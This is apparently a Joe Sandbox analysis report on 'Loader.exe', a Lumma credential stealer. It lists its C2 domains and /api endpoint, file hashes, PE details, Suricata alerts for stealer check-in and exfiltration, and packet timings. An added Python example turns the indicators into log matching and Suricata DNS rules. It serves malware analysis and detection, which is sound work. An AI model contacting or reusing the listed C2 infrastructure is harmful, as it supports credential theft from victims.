              seallysl.site | true | | unknown
              mafnufacut.cyou | true | | unknown
              dilemmadu.site | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://mafnufacut.cyou/gra | aspnet_regiis.exe, 00000003.00000003.2224953764.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2236960687.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://mafnufacut.cyou/h | aspnet_regiis.exe, 00000003.00000003.2168503506.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168437867.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168539185.0000000005B05000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/ac/?q= | aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://mafnufacut.cyou:443/api | aspnet_regiis.exe, 00000003.00000003.2183061646.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2181667282.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2181132499.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2236456187.00000000035EC000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://mafnufacut.cyou/pi | aspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://mafnufacut.cyou/p | aspnet_regiis.exe, 00000003.00000003.2168503506.0000000005AF2000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://mafnufacut.cyou/nkkpib0 | aspnet_regiis.exe, 00000003.00000003.2180903731.0000000005B08000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0 | aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ocsp.rootca1.amazontrust.com0: | aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://mafnufacut.cyou/r | aspnet_regiis.exe, 00000003.00000003.2224953764.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2236960687.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.ecosia.org/newtab/ | aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://mafnufacut.cyou/The | aspnet_regiis.exe, 00000003.00000003.2198830822.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2195854584.0000000005B09000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://mafnufacut.cyou/A | aspnet_regiis.exe, 00000003.00000003.2154322168.000000000368B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | aspnet_regiis.exe, 00000003.00000003.2183106829.0000000005C11000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://mafnufacut.cyou/2U | aspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://ac.ecosia.org/autocomplete?q= | aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://mafnufacut.cyou/apiu | aspnet_regiis.exe, 00000003.00000002.2236456187.00000000035EC000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://x1.c.lencr.org/0 | aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://x1.i.lencr.org/0 | aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0? | aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://mafnufacut.cyou/ | aspnet_regiis.exe, 00000003.00000003.2224998411.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168775207.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168503506.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2236960687.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168731170.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2214118301.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168437867.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168539185.0000000005B05000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2213943534.0000000005AFF000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168486617.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2198964863.0000000005AFF000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2183061646.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2196049342.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2181667282.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2198830822.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2181132499.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2195854584.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168815356.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2213899457.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://mafnufacut.cyou/t7c5 | aspnet_regiis.exe, 00000003.00000003.2180903731.0000000005B08000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://support.mozilla.org/products/firefoxgro.all | aspnet_regiis.exe, 00000003.00000003.2183106829.0000000005C11000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.mozilla.or | aspnet_regiis.exe, 00000003.00000003.2182980628.0000000005B2E000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://mafnufacut.cyou/piE | aspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://mafnufacut.cyou/apiZ | aspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.41.158 | mafnufacut.cyou | United States | 13335 | CLOUDFLARENETUS | true
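The C2 domains from the extracted configuration and the https://mafnufacut.cyou/api endpoint are the indicators worth operationalising from the tables above. The following Python is an added example, not part of the Joe Sandbox report: it takes the report's domains, matches them against constructed DNS and HTTP log lines (the key=value log format is an assumption, not any real product's schema), rates a hit on the /api endpoint higher than a bare domain lookup, and emits Suricata dns.query rules (the SID range is an assumption). The IP 104.21.41.158 is kept for context only and is deliberately not a match key: it is a Cloudflare anycast address, and the context table further down shows it fronting unrelated samples as well.

```python
# Added example, not code from the Joe Sandbox report: turn the report's
# network IOCs into detection logic and run it over constructed log lines.
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlparse

# Domains taken from the report's malware configuration / domain table.
C2_DOMAINS = {
    "mafnufacut.cyou", "servicedny.site", "goalyfeastz.site", "contemteny.site",
    "opposezmny.site", "authorisev.site", "faulteyotk.site", "seallysl.site",
    "dilemmadu.site",
}
C2_URL_PATH = "/api"   # observed C2 endpoint: https://mafnufacut.cyou/api
# Cloudflare anycast address shared with unrelated sites: context only, never a match key.
CONTEXT_ONLY_IPS = {"104.21.41.158"}


@dataclass
class Hit:
    line_no: int
    indicator: str
    kind: str       # "dns", "c2-url" or "domain-in-url"
    severity: str   # "high" for the /api endpoint, "medium" for a bare domain


def _domain_matches(name: str) -> Optional[str]:
    """Return the C2 domain that `name` equals or is a subdomain of, else None."""
    name = name.lower().rstrip(".")
    for d in C2_DOMAINS:
        if name == d or name.endswith("." + d):
            return d
    return None


# Constructed log format (assumption): <ISO timestamp> <host> <type> key=value ...
_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_line(line: str) -> dict:
    parts = line.split(maxsplit=3)
    if len(parts) < 4:
        return {}
    rec = {"ts": parts[0], "host": parts[1], "type": parts[2]}
    for k, v in _KV.findall(parts[3]):
        rec[k] = v.strip('"')
    return rec


def match_iocs(lines) -> List[Hit]:
    hits: List[Hit] = []
    for i, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec.get("type") == "dns":
            d = _domain_matches(rec.get("qname", ""))
            if d:
                hits.append(Hit(i, d, "dns", "medium"))
        elif rec.get("type") == "http":
            u = urlparse(rec.get("url", ""))
            d = _domain_matches(u.hostname or "")
            if d and u.path == C2_URL_PATH:
                hits.append(Hit(i, f"{u.scheme}://{u.hostname}{u.path}", "c2-url", "high"))
            elif d:
                hits.append(Hit(i, d, "domain-in-url", "medium"))
    return hits


def suricata_dns_rules(first_sid: int) -> List[str]:
    """One dns.query rule per C2 domain; the SID range is an assumption."""
    rules = []
    for n, d in enumerate(sorted(C2_DOMAINS)):
        rules.append(
            f'alert dns any any -> any any (msg:"LummaC C2 domain {d}"; '
            f'dns.query; content:"{d}"; nocase; endswith; sid:{first_sid + n}; rev:1;)'
        )
    return rules


# Constructed sample log lines (not taken from the report's PCAP).
SAMPLE_LOG = [
    '2024-10-31T13:07:12Z WS01 dns qname=mafnufacut.cyou rcode=NOERROR answer=104.21.41.158',
    '2024-10-31T13:07:13Z WS01 http method=POST url="https://mafnufacut.cyou/api" status=200',
    '2024-10-31T13:07:20Z WS01 dns qname=duckduckgo.com rcode=NOERROR',
    '2024-10-31T13:08:02Z WS02 dns qname=cdn.servicedny.site rcode=NXDOMAIN',
    '2024-10-31T13:08:05Z WS02 http method=GET url="https://mafnufacut.cyou/gra" status=404',
]

if __name__ == "__main__":
    for h in match_iocs(SAMPLE_LOG):
        print(h)
    print("\n".join(suricata_dns_rules(9000001)))
```

Subdomain matching (`cdn.servicedny.site`) is intentional: stealer operators rotate hosts under the same registered domain, and the NXDOMAIN on that line is still a sighting worth an alert.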
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1546098
Start date and time: 2024-10-31 14:06:04 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Loader.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/2@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 41
• Number of non-executed functions: 128
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 2.16.100.168, 88.221.110.91
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, download.windowsupdate.com.edgesuite.net
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Loader.exe
Time | Type | Description
09:06:57 | API Interceptor | 7x Sleep call for process: aspnet_regiis.exe modified
Match: 104.21.41.158
Associated Sample Name / URL | Detection | Threat Name | Context
4akinoAb5k.pdf | malicious | Unknown |
No context

Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
PO-000172483 (2).exe | malicious | FormBook, GuLoader | 188.114.96.3
Uschamber-TimeSheet Reports.pdf | malicious | Unknown | 104.17.25.14
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.96.3
file.exe | malicious | Stealc, Vidar | 172.64.41.3
https://www.chambersschool.org/programs/early-childhood | malicious | CAPTCHA Scam ClickFix | 188.114.96.3
file.exe | malicious | LummaC | 104.21.33.140
https://pub.lucidpress.com/50f1c535-8058-4eec-b469-2bd69fae4557/ | malicious | Unknown | 1.1.1.1
Product Inquiry-002.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
Quotation enquiry.exe | malicious | Unknown | 188.114.97.3
Pedido de Cotação -RFQ20241030_Pdf.vbs | malicious | GuLoader, Snake Keylogger | 188.114.96.3

Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 104.21.41.158
file.exe | malicious | LummaC | 104.21.41.158
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 104.21.41.158
file.exe | malicious | LummaC | 104.21.41.158
Orden de compra.xla.xlsx | malicious | Unknown | 104.21.41.158
Orden de compra.xla.xlsx | malicious | Unknown | 104.21.41.158
file.exe | malicious | LummaC | 104.21.41.158
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWorm | 104.21.41.158
Swift payment confirmation.exe | malicious | DBatLoader, FormBook | 104.21.41.158
file.exe | malicious | LummaC | 104.21.41.158
No context
Process: C:\Users\user\Desktop\Loader.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 42
Entropy (8bit): 4.0050635535766075
Encrypted: false
SSDEEP: 3:QHXMKa/xwwUy:Q3La/xwQ
MD5: 84CFDB4B995B1DBF543B26B86C863ADC
SHA1: D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256: D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512: 485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..
Note: the preview is the CLR usage log that the .NET runtime writes for any managed process it starts; the content is produced by the runtime, not by the sample, which is why the reputation is "very likely benign". Treat the "Malicious: true" flag as describing the process that wrote the file, not the file itself.
Process: C:\Users\user\Desktop\Loader.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 445440
Entropy (8bit): 6.981749103855763
Encrypted: false
SSDEEP: 6144:rsXFmmtv+sbHkeZ8oDiu8TdaZh6LgzUXajjiMgrX5sQvOo5aqOpC30nQGr5gykQ5:rs1mmhrbHzDiH0Zy5Oo5j0hgykQGQbN
MD5: 330F34F58CCF18D73FD3762D200A21F9
SHA1: 3C5B99BCBD2D8E1A02040A8B25AEBDBD274F422C
SHA-256: 9110EAAF2945DEB7A1AF94855F90FF10A342AE5EF8D70758D5924FA2371D92FD
SHA-512: 6DF28801CDF4A6F59481E3AC93D50637308BE7206958B2CB395CC74FA851BCD2E25FE5F9E926DB2B537F0EEF9CC32EB2A96C3E821A0C51EE57E1B8EE4AAA90CB
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>3.._]]._]]._]].'^\._]].'X\._]].'Y\._]].'\\._]]..&]._]]._\]._]]..X\._]]..Y\._]]..^\._]]._]]._]]..]\._]].._\._]]Rich._]]........................PE..L...g##g...........!...&.,...................@............................................@.............................|...|...P...................................................................P...@............@..X............................text...S*.......,.................. ..`.rdata..fb...@...d...0..............@..@.data...l/.......&..................@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................
File type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.840296208768141
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: Loader.exe
File size: 304'640 bytes
MD5: cf19765d8a9a2c2fd11a7a8c4ba3deda
SHA1: 63b5142b07b7773d4201932e7834ac11eafa1ab3
SHA256: 60b98a0907f9721cf28ccd684b565f7f77a90565e9a2bd47f75c419472c25a1c
SHA512: b97fc305bd0d22e26abf99e302b166cd5d2bb959eddecad0f45dc978761178f5f6d47788c4ad5098313e587198abc66a3477ed42203345c20dc07db4783bb762
SSDEEP: 6144:thP45uoAaSWyz8jVnA183ipgz7YGGmEOM8xm53Jhuy3/uL:t25uDiyzmR7kYVxm5i+2L
TLSH: 7554CF9C765072DFC86BC9729EA81CA4E660B87B531FD243A01326ADD94D9CBCF141F2
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g##g............................N.... ........@.. ....................................@................................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x44b84e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x67232367 [Thu Oct 31 06:27:51 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction (entrypoint disassembly)
jmp dword ptr [00402000h]
add byte ptr [eax], al   (this line is repeated 97 times in the listing: zero-byte padding following the single-instruction .NET entrypoint stub, decoded as add byte ptr [eax], al)
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x4b7fc          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x4c000          0x708         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x4e000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0x49854       0x49a00   11478d500b71c5f4ff306452b8ddcea1  False     0.9063030560271647  data       7.856893494807448    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x4c000          0x708         0x800     a6498f21231860e62bfc99dad3369ddf  False     0.39111328125       data       3.7677582007788284   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x4e000          0xc           0x200     885d15258417db081de9b8be94cfb3dd  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size   Type                                                                                  Language  Country  ZLIB Complexity
RT_VERSION   0x4c0a0  0x478  data                                                                                                     0.44143356643356646
RT_MANIFEST  0x4c518  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                        0.5469387755102041
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                        SID      Signature                                                                Severity  Source IP        Source Port  Dest IP          Dest Port  Protocol
2024-10-31T14:06:57.494593+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                3         192.168.2.6      49711        104.21.41.158    443        TCP
2024-10-31T14:06:58.470442+0100  2049836  ET MALWARE Lumma Stealer Related Activity                                1         192.168.2.6      49711        104.21.41.158    443        TCP
2024-10-31T14:06:58.470442+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                                1         192.168.2.6      49711        104.21.41.158    443        TCP
2024-10-31T14:06:59.156570+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                3         192.168.2.6      49712        104.21.41.158    443        TCP
2024-10-31T14:06:59.686199+0100  2049812  ET MALWARE Lumma Stealer Related Activity M2                             1         192.168.2.6      49712        104.21.41.158    443        TCP
2024-10-31T14:06:59.686199+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                                1         192.168.2.6      49712        104.21.41.158    443        TCP
2024-10-31T14:07:00.649369+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                3         192.168.2.6      49714        104.21.41.158    443        TCP
2024-10-31T14:07:02.067758+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                3         192.168.2.6      49715        104.21.41.158    443        TCP
2024-10-31T14:07:03.452181+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                3         192.168.2.6      49716        104.21.41.158    443        TCP
2024-10-31T14:07:05.365767+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                3         192.168.2.6      49718        104.21.41.158    443        TCP
2024-10-31T14:07:06.542858+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                3         192.168.2.6      49724        104.21.41.158    443        TCP
2024-10-31T14:07:06.993386+0100  2048094  ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration                    1         192.168.2.6      49724        104.21.41.158    443        TCP
2024-10-31T14:07:07.633124+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                3         192.168.2.6      49730        104.21.41.158    443        TCP
2024-10-31T14:07:08.115142+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                                1         192.168.2.6      49730        104.21.41.158    443        TCP
2024-10-31T14:07:13.468749+0100  2022930  ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow   1         172.202.163.200  443          192.168.2.6      49756      TCP
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Oct 31, 2024 14:06:56.656619072 CET  49711        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:56.656647921 CET  443          49711      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:56.656733990 CET  49711        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:56.660315990 CET  49711        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:56.660331011 CET  443          49711      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:57.494502068 CET  443          49711      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:57.494592905 CET  49711        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:57.689599991 CET  49711        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:57.689613104 CET  443          49711      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:57.689908028 CET  443          49711      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:57.738065958 CET  49711        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:57.839191914 CET  49711        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:57.839214087 CET  49711        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:57.839267015 CET  443          49711      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:58.470464945 CET  443          49711      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:58.470647097 CET  443          49711      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:58.470727921 CET  49711        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:58.473134041 CET  49711        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:58.473144054 CET  443          49711      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:58.525705099 CET  49712        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:58.525738001 CET  443          49712      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:58.525815964 CET  49712        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:58.526113033 CET  49712        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:58.526125908 CET  443          49712      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:59.156486988 CET  443          49712      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:59.156569958 CET  49712        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:59.158492088 CET  49712        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:59.158499002 CET  443          49712      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:59.158720016 CET  443          49712      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:59.160222054 CET  49712        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:59.160284042 CET  49712        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:59.160299063 CET  443          49712      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:59.686206102 CET  443          49712      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:59.686244965 CET  443          49712      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:59.686269999 CET  443          49712      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:59.686306953 CET  443          49712      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:59.686337948 CET  443          49712      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:59.686363935 CET  443          49712      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:59.686363935 CET  49712        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:59.686373949 CET  443          49712      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:59.686405897 CET  49712        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:59.686554909 CET  443          49712      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:59.686599016 CET  49712        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:59.686605930 CET  443          49712      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:59.738230944 CET  49712        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:59.929222107 CET  443          49712      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:59.929297924 CET  443          49712      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:59.929332972 CET  443          49712      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:59.929379940 CET  49712        443        192.168.2.6    104.21.41.158
